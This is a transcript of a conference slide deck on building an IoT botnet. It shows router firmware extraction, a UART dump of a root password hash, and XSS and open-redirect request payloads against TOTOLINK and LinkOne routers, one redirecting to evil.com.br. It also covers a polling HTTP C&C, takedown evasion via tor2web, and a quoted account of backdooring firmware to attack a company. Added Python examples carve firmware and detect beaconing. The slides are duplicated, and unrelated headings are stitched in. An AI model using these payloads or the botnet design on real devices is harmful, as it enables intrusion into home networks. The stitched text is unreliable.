NullByte-C0n
C&C B0tn3t F4ct0ry
by: Torontux
# whoami
* Toronto Garcez aka Torontux
* Pentester
* IoT cell leader
* BWCon www.bwcon.com.br
# cat agenda.txt
* Motivation
* Firmwares
- how to get?
- binwalk + firmware-mod-kit
- Cross Compiling, Malta, Busybox
* Bugs + bugs + bugs ...
* C&C (cec.rb + bn.rb)
* Demo
* Next steps
# wget http://pastebin.com/raw/0SNSvyjJ
[ASCII art banner: "Hack Back!"]
A DIY Guide
[ASCII art: HT logo]
#antisec
# cat hacklog.txt
“So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices. A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit.”

“I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device.”
# man firmwares
* Download Firmware updates
* Extract from serial(UART)
* Looking for filesystem
# man firmwares
* binwalk + hexdump + firmware-mod-kit
* Look for big chunks of 00s or FFs delimiting the parts
* Check for common compression stream patterns
  -> zlib: 78 01, 78 9C, 78 DA
  -> gzip: 1F 8B
  -> LZMA: 5D 00 00 80
* Offset to extract the filesystem
* squashfs
# hexdump -C wr740nv6.bin |more
00000000 01 00 00 00 54 50 2d 4c 49 4e 4b 20 54 65 63 68 |....TP-LINK Tech |
00000010 6e 6f 6c 6f 67 69 65 73 00 00 00 00 76 65 72 2e |nologies....ver.|
00000020 20 31 2e 30 00 00 00 00 00 00 00 00 00 00 00 00 | 1.0............|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 07 40 00 06 00 00 00 01 00 00 00 00 df 34 0f 03 |.@...........4..|
00000050 18 76 7d 82 2f 96 05 35 43 b2 be 7b 00 00 00 00 |.v}./..5C..{....|
00000060 d6 3b e9 70 2e 5b ca 44 4a e9 a7 33 e1 d9 9b ee |.;.p.[.DJ..3....|
00000070 00 00 00 00 80 00 20 00 80 1c cf b0 00 3e 02 00 |...... ......>..|
...
00120200 68 73 71 73 53 02 00 00 74 d1 1c 56 00 00 02 00 |hsqsS...t..V....|
00120210 29 00 00 00 02 00 11 00 e0 00 01 00 04 00 00 00 |)...............|
00120220 0b 0b 5b 0e 00 00 00 00 2b e6 2a 00 00 00 00 00 |..[.....+.*.....|
00120230 23 e6 2a 00 00 00 00 00 ff ff ff ff ff ff ff ff |#.*.............|
...
# binwalk wr740nv6_br.bin
DECIMAL HEX DESCRIPTION
---------------------------------------------------------------------
0 0x0 TP-Link firmware header, firmware version: 0.-15447.3, ...
13424 0x3470 U-Boot version string, U-Boot 1.1.4
13472 0x34A0 CRC32 polynomial table, big endian
14784 0x39C0 uImage header, OS: Linux, CPU: MIPS, compression type: lzma, image name: "u-boot image"
14848 0x3A00 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 93336 bytes
131584 0x20200 TP-Link firmware header, firmware version: 0.0.3
132096 0x20400 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2495224 bytes
1180160 0x120200 Squashfs filesystem, little endian, version 4.0...
# dd if=wr740nv6_br.bin skip=1 bs=1180160 of=filesystem.squashfs
2+1 registros de entrada
2+1 registros de saída
2883584 bytes (2,9 MB) copiados, 0,0106605 s, 270 MB/s
# file filesystem.squashfs
filesystem.squashfs: Squashfs filesystem, little endian, version 4.0,
# binwalk -e wr740nv6_br.bin
DECIMAL HEX DESCRIPTION
--------------------------------------------------------------------------
0 0x0 TP-Link firmware header, firmware version: 0.-15447.3, ...
...
1180160 0x120200 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2811435 bytes, 595 inodes, blocksize: 131072 bytes, created: 2015-10-13 09:40:04
# ls -lhs _wr740nv6_br.bin.extracted/squashfs-root/
total 52K
4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 bin
4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 dev
4,0K drwxr-xr-x 7 root root 4,0K Set 21 2015 etc
4,0K drwxr-xr-x 5 root root 4,0K Set 21 2015 lib
0 lrwxrwxrwx 1 root root 11 Nov 15 13:57 linuxrc -> bin/busybox
4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 mnt
4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 proc
4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 root
4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sbin
4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sys
4,0K drwxrwxrwt 2 root root 4,0K Set 21 2015 tmp
4,0K drwxr-xr-x 4 root root 4,0K Set 21 2015 usr
4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 var
4,0K drwxr-xr-x 10 root root 4,0K Out 13 2015 web
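The manual hexdump / binwalk / dd workflow above can be scripted for a first pass over an unknown image. The following is an added example, not code from the talk: it scans for the compression-stream patterns listed on the "man firmwares" slide, reports the large 00/FF runs that delimit the image parts, decodes the squashfs 4.0 superblock and carves the filesystem at its offset. The sample image is constructed inside the script from the TP-Link header bytes and the squashfs superblock bytes shown in the hexdump; the 0x200 and 0x1000 offsets, the LZMA stub and the filler bytes are invented so the script runs offline.

```python
"""Scan a raw firmware image for the compression and filesystem magic bytes,
locate the 00/FF padding runs that delimit the parts, decode the squashfs
superblock and carve the filesystem at its offset.
Added example, not the talk's code. HEADER and SUPERBLOCK below are the bytes
from the slides' hexdump; every other offset and filler byte is invented."""
import re
import struct
from datetime import datetime, timezone

# Magic patterns from the slides, plus the squashfs superblock magic.
MAGICS = {
    "zlib (78 01)": b"\x78\x01",
    "zlib (78 9C)": b"\x78\x9c",
    "zlib (78 DA)": b"\x78\xda",
    "gzip": b"\x1f\x8b",
    "lzma (8 MiB dict)": b"\x5d\x00\x00\x80",
    "squashfs-le": b"hsqs",  # little-endian squashfs superblock
    "squashfs-be": b"sqsh",  # big-endian squashfs superblock
}

# Leading 48 bytes of a squashfs 4.0 superblock (little-endian).
SB_FORMAT = "<4sIIIIHHHHHHQQ"
SB_FIELDS = ("magic", "inodes", "mkfs_time", "block_size", "fragments",
             "compression", "block_log", "flags", "no_ids", "major",
             "minor", "root_inode", "bytes_used")
COMPRESSION = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz", 5: "lz4", 6: "zstd"}

def find_magics(image):
    """All (offset, name) pairs where a known magic occurs, sorted by offset.
    The two-byte zlib magics also match by chance; treat them as hints."""
    hits = []
    for name, magic in MAGICS.items():
        pos = image.find(magic)
        while pos >= 0:
            hits.append((pos, name))
            pos = image.find(magic, pos + 1)
    return sorted(hits)

def find_padding_runs(image, min_run=256):
    """(start, end, byte) for runs of 0x00 or 0xFF at least min_run long:
    the 'big chunks of 00s or FFs' separating bootloader, kernel and rootfs."""
    pat = re.compile(rb"\x00{%d,}|\xff{%d,}" % (min_run, min_run))
    return [(m.start(), m.end(), m.group()[0]) for m in pat.finditer(image)]

def parse_squashfs_superblock(image, offset):
    """Decode the superblock at offset; ValueError if there is none."""
    size = struct.calcsize(SB_FORMAT)
    raw = image[offset:offset + size]
    if len(raw) < size:
        raise ValueError("image truncated inside the superblock")
    sb = dict(zip(SB_FIELDS, struct.unpack(SB_FORMAT, raw)))
    if sb["magic"] != b"hsqs":
        raise ValueError("no little-endian squashfs superblock at 0x%x" % offset)
    sb["compression_name"] = COMPRESSION.get(sb["compression"], "unknown")
    sb["created"] = datetime.fromtimestamp(sb["mkfs_time"], tz=timezone.utc).isoformat()
    return sb

def carve_squashfs(image):
    """Find the first squashfs and return (offset, superblock, data, complete).
    complete is False when the image ends before bytes_used: a truncated dump."""
    offset = image.find(b"hsqs")
    if offset < 0:
        raise ValueError("no squashfs magic found")
    sb = parse_squashfs_superblock(image, offset)
    data = image[offset:offset + sb["bytes_used"]]
    return offset, sb, data, len(data) == sb["bytes_used"]

def dd_command(image_name, offset, out="filesystem.squashfs"):
    """The dd one-liner equivalent to the carve: skip one block of size offset."""
    return "dd if=%s bs=%d skip=1 of=%s" % (image_name, offset, out)

# Constructed sample image (see the docstring for what is real and what is not).
HEADER = b"\x01\x00\x00\x00TP-LINK Technologies\x00\x00\x00\x00ver. 1.0"
SUPERBLOCK = bytes.fromhex(
    "68737173 53020000 74d11c56 00000200"
    "29000000 0200 1100 e000 0100 0400 0000"
    "0b0b5b0e 00000000 2be62a00 00000000"
    "23e62a00 00000000 ffffffff ffffffff"
)

def build_sample_image():
    img = HEADER.ljust(0x200, b"\x00")             # header, zero padded
    img += b"\x5d\x00\x00\x80" + b"\x13\x37" * 6   # invented LZMA stream start
    img = img.ljust(0x1000, b"\xff")               # erased-flash style gap
    img += SUPERBLOCK
    return img.ljust(0x1000 + 2811435, b"\xff")    # fill up to bytes_used

if __name__ == "__main__":
    img = build_sample_image()
    for off, name in find_magics(img):
        print("0x%08x  %s" % (off, name))
    for start, end, byte in find_padding_runs(img):
        print("0x%02x padding 0x%x-0x%x" % (byte, start, end))
    off, sb, data, complete = carve_squashfs(img)
    print("squashfs at 0x%x: %d inodes, %s, %d bytes, created %s, complete=%s"
          % (off, sb["inodes"], sb["compression_name"], sb["bytes_used"],
             sb["created"], complete))
    print(dd_command("wr740nv6_br.bin", off))
```

Two caveats a practitioner should keep in mind. The superblock fields decoded here (595 inodes, lzma, 131072-byte blocks, 2811435 bytes used, created 2015-10-13 09:40:04 UTC) are the same values binwalk prints for the wr740nv6 image, so the parser is a cheap cross-check on binwalk's output, and the `complete` flag catches a dump that stopped before the filesystem ended. The slide's LZMA pattern `5D 00 00 80` is the properties byte followed by an 8 MiB dictionary size; the TP-Link streams in the binwalk output use a 32 MiB dictionary (`5D 00 00 00 02`), so only the leading `5D` is reliable across images and a hit needs confirming by decompressing.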
# binwalk wr720nv2-en-up.bin
DECIMAL HEXADECIMAL DESCRIPTION
------------------------------------------------------------------
20 0x14 IMG0 (VxWorks) header, size: 1559872
26740 0x6874 VxWorks operating system version "5.5.1", compiled: "Jun 18 2013, 12:19:11"
26836 0x68D4 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 636256 bytes
262292 0x40094 IMG0 (VxWorks) header, size: 1297600
262420 0x40114 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3657936 bytes
1256228 0x132B24 Wind River management filesystem, compressed, 194 files
1265584 0x134FB0 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 14696 bytes
1268652 0x135BAC LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 629 bytes
1268992 0x135D00 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 2731 bytes
# man firmware-mod-kit
./extract-firmware.sh wr740nv6_br.bin
fmk/rootfs/
fmk/new-filesystem.squashfs
fmk/logs/config.log
fmk/logs/binwalk.log
fmk/image_parts/header.img
fmk/image_parts/rootfs.img
./build-firmware.sh
fmk/new-firmware.bin
# man cross compiling |grep mips
* gcc-mips-linux-gnu
* -static option (Will increase size)
* strip
* Tks Rafael Machado ;)
root@debian-mips:~# ls -lhsa
4,0K drwx------ 5 root root 4,0K Nov 25 18:18 .
4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 ..
664K -rwxr-xr-x 1 root root 657K Nov 25 18:18 teste
root@debian-mips:~# strip teste
4,0K drwx------ 5 root root 4,0K Nov 25 18:18 .
4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 ..
608K -rwxr-xr-x 1 root root 604K Nov 25 18:19 teste
# man qemu |grep mips
* https://www.linux-mips.org/wiki/MIPS_Malta
* Debian Squeeze and Wheezy mips images for QEMU:
https://people.debian.org/~aurel32/qemu/mips/
qemu-system-mips -M malta -m 256 -kernel vmlinux-2.6.32-5-4kc-malta \
  -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" \
  -vnc 172.16.68.128:0 -net nic -net user,hostfwd=tcp::2222-:22
root@172.16.68.128's password:
Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC
2013 mips
Last login: Fri Nov 25 17:19:33 2016
root@debian-mips:~#
root@debian-mips:~# uname -a
Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC
2013 mips GNU/Linux
# cd busybox && make menuconfig
# man UART
TP-Link TL-WR841ND
- 2 detachable antennas
- 4 Port 100/10 Switch
- 1 Port 100/10 Wan Interface
- 4 MB Flash
- 32 MB Ram
- WPS Button
- Wi-Fi On/Off Button
* Tks Osvaldo! ;)
# man UART
* Find RX/TX/GND/VCC
* VCC 3.3 V
* GND 0 V
* TX about 3 V
* Baud rate 115200
cat /etc/shadow
root:$1$GTN.gpri$DlSyKvZKMR9A9Uj9e9wR3/:15502:0:99999:7:::
# cat bugs.txt
* looking for bugs:
- Web applications (XSS,CSRF,LFI,RCE,etc...)
- Memory Corruptions
- Hardcoded passwords and Default credentials
- Backdoors
- Information disclosures
# cat totolink_payload.txt
POST /login.cgi HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/login.htm
Cookie: SessionID=
username=admin&password=%22%3E%3Cscript%3Ealert%28%22NullByte%22%29%3B%3C%2Fscript%3E&submit.htm%3Flogin.htm=Send
# cat linkOne_payloads.txt
GET /goform/SafeWanWebMan?GO=system_remote.asp&RMEN=1&port=8080&IP=0.0.0.0"%3balert(1)%2f%2f HTTP/1.1
Host: 192.168.0.1
Cookie: language=en; admin:language=en
Connection: keep-alive
POST /goform/SysStatusHandle HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux
x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Referer: http://192.168.0.1/system_status.asp
Cookie: language=en; admin:language=en
CMD=WAN_CON&GO=system_status.asp&action=;alert(1);
# cat linkOne_payloads2.txt
Open Redirect
--------------
GET /goform/SysStatusHandle?CMD=&GO=http://www.evil.com.br&action= HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux
x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: language=en; admin:language=en
Connection: close
# man cec
* Command and Control
* Ruby
* Client and Server (cec.rb and bn.rb)
* HTTP
* No frameworks (plain CGI)
# man cec
[Diagram: C&C server and C&C client (bot.sh); the client polls the server for commands every 5s]
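A C&C that speaks plain HTTP and has its clients fetch commands every 5 s leaves a very regular trace in whatever web-server or proxy log sits in the path. The following is an added example written from the defender's side, not code from the talk or from cec.rb/bn.rb: it parses access-log lines and flags any client that requests the same path at a near-constant interval. The log lines, the hosts and the /bot/cmd.cgi path are constructed for the demonstration.

```python
"""Flag clients that fetch the same URL at a fixed interval, the pattern a
bot polling an HTTP C&C for commands every 5 s leaves in a web-server log.
Added example, not the talk's code; the access-log lines, hosts and the
/bot/cmd.cgi path are constructed for the demonstration."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Apache/nginx common-format request line (referer and user agent omitted).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """(ip, path, timestamp) for a well-formed line, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("path"), datetime.strptime(m.group("ts"), TS_FORMAT)

def find_beacons(lines, min_hits=6, max_jitter=0.15):
    """{(ip, path): period_seconds} for clients with at least min_hits requests
    to one path whose inter-arrival times vary by less than max_jitter
    (population stdev divided by mean). Human browsing is far more irregular."""
    series = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ip, path, ts = parsed
            series[(ip, path)].append(ts)
    beacons = {}
    for key, stamps in series.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            beacons[key] = round(mean, 2)
    return beacons

def _line(ip, hhmmss, path, status=200, size=12):
    """One constructed log line; the date is arbitrary."""
    return '%s - - [25/Nov/2016:%s +0000] "GET %s HTTP/1.1" %d %d' % (
        ip, hhmmss, path, status, size)

# Constructed sample: a bot polling every ~5 s (one 6 s gap to show the
# tolerance), a human browsing irregularly, and one malformed line to skip.
SAMPLE_LOG = (
    [_line("10.0.0.5", "18:00:%02d" % s, "/bot/cmd.cgi")
     for s in (0, 5, 10, 15, 20, 25, 30, 36)]
    + [_line("10.0.0.7", t, "/index.html", size=5120)
       for t in ("18:00:01", "18:00:40", "18:02:15", "18:05:02", "18:05:03", "18:07:30")]
    + ["garbage line that is not an access-log record"]
)

if __name__ == "__main__":
    for (ip, path), period in find_beacons(SAMPLE_LOG).items():
        print("%s polls %s every %.2f s" % (ip, path, period))
```

The jitter threshold is the knob: a bot that sleeps a fixed 5 s scores near zero, while a person clicking through pages scores well above 0.5. Real bots often add random sleep to blur this, which is why `max_jitter` is a parameter rather than a constant; raising `min_hits` trades detection delay for fewer false positives on legitimate pollers such as monitoring checks.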
# ./demo
# cat next_steps.txt
* Fix bugs
* Code refactor
* More features
* Cryptography
* Clients to ARM / MIPS / etc...
* TakeDown Evasion
# man tor2web
* https://www.tor2web.org/
“Tor is a software project that lets you anonymously browse the Internet. Tor2web is a project to let Internet users access Tor Onion Services without using Tor Browser”
* replace .onion with .onion.to or .onion.city or .onion.cab or .onion.direct
* Anonymity for the server
* eqt5g4fuenphqinx.onion
* End-to-end encryption
Questions?
AI as an Interface for Commercial Buildings
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 

C&C Botnet Factory

• 1. NullByte-C0n
C&C B0tn3t F4ct0ry
by: Torontux

• 2. # whoami
* Toronto Garcez aka Torontux
* Pentester
* IoT cell leader
* BWCon www.bwcon.com.br

• 3. # cat agenda.txt
* Motivation
* Firmwares
- how to get?
- binwalk + firmware-mod-kit
- Cross Compiling, Malta, Busybox
* Bugs + bugs + bugs ...
* C&C (cec.rb + bn.rb)
* Demo
* Next steps
• 4. # wget http://pastebin.com/raw/0SNSvyjJ
(ASCII-art banner reading "Hack Back! A DIY Guide")
#antisec
• 5. # cat hacklog.txt
“So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices. A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit.”
“I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device.”

• 6. # man firmwares
* Download Firmware updates
* Extract from serial (UART)
* Looking for filesystem
• 7. # man firmwares
* binwalk + hexdump + firmware-mod-kit
* Look for big chunks of 00s or FFs delimiting the parts
* Check for common compression stream patterns
-> zlib: 78 01, 78 9C, 78 DA
-> gzip: 1F 8B
-> LZMA: 5D 00 00 80
* Offset to extract the filesystem
* squashfs

• 8. # hexdump -C wr740nv6.bin | more
00000000  01 00 00 00 54 50 2d 4c 49 4e 4b 20 54 65 63 68  |....TP-LINK Tech|
00000010  6e 6f 6c 6f 67 69 65 73 00 00 00 00 76 65 72 2e  |nologies....ver.|
00000020  20 31 2e 30 00 00 00 00 00 00 00 00 00 00 00 00  | 1.0............|
00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000040  07 40 00 06 00 00 00 01 00 00 00 00 df 34 0f 03  |.@...........4..|
00000050  18 76 7d 82 2f 96 05 35 43 b2 be 7b 00 00 00 00  |.v}./..5C..{....|
00000060  d6 3b e9 70 2e 5b ca 44 4a e9 a7 33 e1 d9 9b ee  |.;.p.[.DJ..3....|
00000070  00 00 00 00 80 00 20 00 80 1c cf b0 00 3e 02 00  |...... ......>..|
...
00120200  68 73 71 73 53 02 00 00 74 d1 1c 56 00 00 02 00  |hsqsS...t..V....|
00120210  29 00 00 00 02 00 11 00 e0 00 01 00 04 00 00 00  |)...............|
00120220  0b 0b 5b 0e 00 00 00 00 2b e6 2a 00 00 00 00 00  |..[.....+.*.....|
00120230  23 e6 2a 00 00 00 00 00 ff ff ff ff ff ff ff ff  |#.*.............|
...
• 9. # binwalk wr740nv6_br.bin
DECIMAL       HEX           DESCRIPTION
---------------------------------------------------------------------
0             0x0           TP-Link firmware header, firmware version: 0.-15447.3, ...
13424         0x3470        U-Boot version string, U-Boot 1.1.4
13472         0x34A0        CRC32 polynomial table, big endian
14784         0x39C0        uImage header, OS: Linux, CPU: MIPS, compression type: lzma, image name: "u-boot image"
14848         0x3A00        LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 93336 bytes
131584        0x20200       TP-Link firmware header, firmware version: 0.0.3
132096        0x20400       LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2495224 bytes
1180160       0x120200      Squashfs filesystem, little endian, version 4.0...

# dd if=wr740nv6_br.bin skip=1 bs=1180160 of=filesystem.squashfs
2+1 registros de entrada
2+1 registros de saída
2883584 bytes (2,9 MB) copiados, 0,0106605 s, 270 MB/s

# file filesystem.squashfs
filesystem.squashfs: Squashfs filesystem, little endian, version 4.0,

• 10. # binwalk -e wr740nv6_br.bin
DECIMAL       HEX           DESCRIPTION
--------------------------------------------------------------------------
0             0x0           TP-Link firmware header, firmware version: 0.-15447.3, ...
...
1180160       0x120200      Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2811435 bytes, 595 inodes, blocksize: 131072 bytes, created: 2015-10-13 09:40:04

# ls -lhs _wr740nv6_br.bin.extracted/squashfs-root/
total 52K
4,0K drwxr-xr-x  2 root root 4,0K Set 21  2015 bin
4,0K drwxr-xr-x  3 root root 4,0K Set 21  2015 dev
4,0K drwxr-xr-x  7 root root 4,0K Set 21  2015 etc
4,0K drwxr-xr-x  5 root root 4,0K Set 21  2015 lib
   0 lrwxrwxrwx  1 root root   11 Nov 15 13:57 linuxrc -> bin/busybox
4,0K drwxr-xr-x  2 root root 4,0K Set 21  2015 mnt
4,0K drwxr-xr-x  2 root root 4,0K Set 21  2015 proc
4,0K drwxr-xr-x  2 root root 4,0K Set 21  2015 root
4,0K drwxr-xr-x  2 root root 4,0K Set 21  2015 sbin
4,0K drwxr-xr-x  2 root root 4,0K Set 21  2015 sys
4,0K drwxrwxrwt  2 root root 4,0K Set 21  2015 tmp
4,0K drwxr-xr-x  4 root root 4,0K Set 21  2015 usr
4,0K drwxr-xr-x  3 root root 4,0K Set 21  2015 var
4,0K drwxr-xr-x 10 root root 4,0K Out 13  2015 web
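The marker hunt on slide 7, the superblock bytes on slide 8 and the carve on slides 9 and 10, as one added Python example that is not part of the talk: it scans a constructed image (sample TP-Link-style header, a zlib stream, an LZMA header and the 64 superblock bytes from slide 8 placed at 0x200 instead of 0x120200) for the signatures the slides list, drops chance zlib hits with the RFC 1950 header check, reads the fields binwalk reports on slide 10, and carves the squashfs by byte offset rather than relying on skip=1 with bs equal to the offset.

```python
import struct
import zlib

# Markers from slide 7 plus the squashfs "hsqs" magic seen at 0x120200 on slide 8.
SIGNATURES = {"zlib": [b"\x78\x01", b"\x78\x9c", b"\x78\xda"], "gzip": [b"\x1f\x8b"],
              "lzma": [b"\x5d\x00\x00\x80"], "squashfs": [b"hsqs"]}

# The 64 superblock bytes from the slide-8 hexdump, reused in the constructed sample.
SQUASHFS_SUPERBLOCK = bytes.fromhex(
    "68737173 53020000 74d11c56 00000200 29000000 02001100 e0000100 04000000"
    "0b0b5b0e 00000000 2be62a00 00000000 23e62a00 00000000 ffffffff ffffffff")

def zlib_header_ok(buf: bytes, off: int) -> bool:
    # A 2-byte marker is hit by chance all the time; RFC 1950 requires
    # (CMF*256 + FLG) % 31 == 0, which discards most false positives.
    return (buf[off] * 256 + buf[off + 1]) % 31 == 0

def scan(image: bytes):
    """(offset, kind) for every marker hit, ordered like binwalk's listing."""
    hits = []
    for kind, magics in SIGNATURES.items():
        for magic in magics:
            off = image.find(magic)
            while off != -1:
                if kind != "zlib" or zlib_header_ok(image, off):
                    hits.append((off, kind))
                off = image.find(magic, off + 1)
    return sorted(hits)

def parse_superblock(image: bytes, off: int) -> dict:
    """Squashfs 4.0 fields that binwalk prints on slide 10 (all little endian)."""
    inodes, _, block_size, _, compressor, block_log = struct.unpack_from("<IIIIHH", image, off + 4)
    bytes_used = struct.unpack_from("<Q", image, off + 40)[0]
    return {"inodes": inodes, "block_size": block_size, "compressor": compressor,
            "block_log": block_log, "bytes_used": bytes_used}

def carve_squashfs(image: bytes):
    """Byte-exact form of the slide-9 dd step (skip=1 bs=<offset> only works
    there because offset == bs); also reports whether the image is truncated."""
    off = next(o for o, k in scan(image) if k == "squashfs")
    sb = parse_superblock(image, off)
    data = image[off:off + sb["bytes_used"]]
    return off, sb, data, len(data) == sb["bytes_used"]

def build_sample_image() -> bytes:
    """Constructed stand-in for wr740nv6_br.bin: bogus 78 02 at 0x30, zlib at 0x40, LZMA at 0x100."""
    img = b"\x01\x00\x00\x00TP-LINK Technologies\x00\x00\x00\x00ver. 1.0"
    img = img.ljust(0x30, b"\x00") + b"\x78\x02" + b"\x00" * 14 + zlib.compress(b"abc")
    img = img.ljust(0x100, b"\x00") + b"\x5d" + struct.pack("<IQ", 8 << 20, 93336)
    return img.ljust(0x200, b"\x00") + SQUASHFS_SUPERBLOCK + b"\xff" * 64
```

On the constructed image the squashfs is found at 0x200 with 595 inodes, a 131072-byte block size and bytes_used 2811435, but the carve is flagged incomplete because the sample is shorter than the superblock claims; on the real file the same check tells you whether a truncated download or a wrong bs cut the filesystem short.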
• 11. # binwalk wr720nv2-en-up.bin
DECIMAL       HEXADECIMAL   DESCRIPTION
------------------------------------------------------------------
20            0x14          IMG0 (VxWorks) header, size: 1559872
26740         0x6874        VxWorks operating system version "5.5.1", compiled: "Jun 18 2013, 12:19:11"
26836         0x68D4        LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 636256 bytes
262292        0x40094       IMG0 (VxWorks) header, size: 1297600
262420        0x40114       LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3657936 bytes
1256228       0x132B24      Wind River management filesystem, compressed, 194 files
1265584       0x134FB0      LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 14696 bytes
1268652       0x135BAC      LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 629 bytes
1268992       0x135D00      LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 2731 bytes

• 12. # man firmware-mod-kit
./extract-firmware.sh wr740nv6_br.bin
fmk/rootfs/
fmk/new-filesystem.squashfs
fmk/logs/config.log
fmk/logs/binwalk.log
fmk/image_parts/header.img
fmk/image_parts/rootfs.img
./build-firmware.sh
fmk/new-firmware.bin

• 13. # man cross compiling |grep mips
* gcc-mips-linux-gnu
* -static option (Will increase size)
* strip
* Tks Rafael Machado ;)
root@debian-mips:~# ls -lhsa
4,0K drwx------  5 root root 4,0K Nov 25 18:18 .
4,0K drwxr-xr-x 21 root root 4,0K Dez  8  2013 ..
664K -rwxr-xr-x  1 root root 657K Nov 25 18:18 teste
root@debian-mips:~# strip teste
root@debian-mips:~# ls -lhsa
4,0K drwx------  5 root root 4,0K Nov 25 18:18 .
4,0K drwxr-xr-x 21 root root 4,0K Dez  8  2013 ..
608K -rwxr-xr-x  1 root root 604K Nov 25 18:19 teste

• 14. # man qemu |grep mips
* https://www.linux-mips.org/wiki/MIPS_Malta
* Debian Squeeze and Wheezy mips images for QEMU: https://people.debian.org/~aurel32/qemu/mips/
qemu-system-mips -M malta -m 256 -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -vnc 172.16.68.128:0 -net nic -net user,hostfwd=tcp::2222-:22
root@172.16.68.128's password:
Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips
Last login: Fri Nov 25 17:19:33 2016
root@debian-mips:~#
root@debian-mips:~# uname -a
Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips GNU/Linux
  • 15. # cd busybox && make menuconfig
• 16. # man UART
TP-Link TL-WR841ND
- 2 detachable antennas
- 4 Port 100/10 Switch
- 1 Port 100/10 Wan Interface
- 4 MB Flash
- 32 MB Ram
- WPS Button
- Wi-Fi On/Off Button
* Tks Osvaldo! ;)

• 17. # man UART
* Find RX/TX/GND/VCC
* VCC 3v3
* GND 0,0
* TX about 3v
* Baud rate 115200
cat /etc/shadow
root:$1$GTN.gpri$DlSyKvZKMR9A9Uj9e9wR3/:15502:0:99999:7:::
• 18. # cat bugs.txt
* looking for bugs:
- Web applications (XSS, CSRF, LFI, RCE, etc...)
- Memory Corruptions
- Hardcoded passwords and Default credentials
- Backdoors
- Information disclosures

• 19. # cat totolink_payload.txt
POST /login.cgi HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/login.htm
Cookie: SessionID=

username=admin&password=%22%3E%3Cscript%3Ealert%28%22NullByte%22%29%3B%3C%2Fscript%3E&submit.htm%3Flogin.htm=Send

• 20. # cat linkOne_payloads.txt
GET /goform/SafeWanWebMan?GO=system_remote.asp&RMEN=1&port=8080&IP=0.0.0.0"%3balert(1)%2f%2f HTTP/1.1
Host: 192.168.0.1
Cookie: language=en; admin:language=en
Connection: keep-alive

POST /goform/SysStatusHandle HTTP/1.1
Host: 192.168.0.1
